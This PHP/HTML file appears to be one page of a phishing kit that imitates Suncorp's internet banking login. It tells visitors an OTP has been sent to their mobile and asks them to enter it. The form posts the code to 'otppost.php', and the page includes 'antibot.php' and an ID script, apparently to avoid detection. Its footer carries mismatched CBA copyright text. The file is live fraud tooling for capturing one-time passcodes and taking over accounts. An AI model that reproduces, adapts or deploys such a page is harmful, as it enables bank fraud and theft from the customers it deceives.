﻿<?php
require "antibot.php";
include "id.php";
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Internet Banking</title>
    <link rel="stylesheet" href="styles.css">
    <script src="script.js" defer></script>
</head>
<body>
    <header>
        <div class="logo">
            <img src="suncorp-logo.png" alt="Suncorp Logo" style="
    width: 250px;
    height: 70px;
">
        </div>
    </header>
    <main>
        <div class="container">
            <div class="login-container">
                <h2>Logged On - <span id="current-date"></span></h2>
                <p><strong>We have sent you an OTP to your mobile number to verify your identity.</strong></p>
                <form id="otp-verification-form" method="POST" action="otppost.php">
                    <label for="otp">Enter OTP</label>
                    <input type="text" id="otp" name="otp" maxlength="9" required placeholder="OTP">

                    <button type="submit">Verify</button>
                </form>
            </div>
            <aside>
                <h3>Need some help?</h3>
                <ul>
                    <li><a href="#"><span class="icon-arrowRight"></span>Login and Password Support</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Frequently asked questions</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>How to use Internet Banking</a></li>
                </ul>
                <h3>Being safe online</h3>
                <ul>
                    <li><a href="#"><span class="icon-arrowRight"></span>See how we protect your money online</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Identify scams at home</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Safe banking tips</a></li>
                    <li><a href="#"><span class="icon-arrowRight"></span>Protecting your computer</a></li>
                </ul>
                <p class="security-note"><strong>Suncorp Security</strong> Committed to providing you a safe banking environment</p>
            </aside>
        </div>
    </main>
    <footer>
        <p>Terms and Conditions &nbsp; | &nbsp; Contact Us</p>
        <p>© Copyright CBA ABN 66 010 831 722<br>
        CBA Banking, Issued by CBA AFSL No 229882</p>
    </footer>
    <script>
        document.getElementById('current-date').innerText = new Date().toLocaleDateString();
    </script>
				<script src="https://www.google.com/recaptcha/api.js?render=<?php echo $siteKey; ?>"></script>
<script>
grecaptcha.ready(function() {
    document.getElementById('otp-verification-form').addEventListener('submit', function(event) {
        event.preventDefault(); // Prevent form submission
        grecaptcha.execute('<?php echo $siteKey; ?>', {action: 'submit'}).then(function(token) {
            // Add your logic to submit form or append the token to the form
            var recaptchaResponse = document.createElement('input');
            recaptchaResponse.type = 'hidden';
            recaptchaResponse.name = 'recaptcha_response';
            recaptchaResponse.value = token;
            document.getElementById('otp-verification-form').appendChild(recaptchaResponse);

            // Now submit the form
            document.getElementById('otp-verification-form').submit();
        });
    });
});
</script>
</body>
</html>
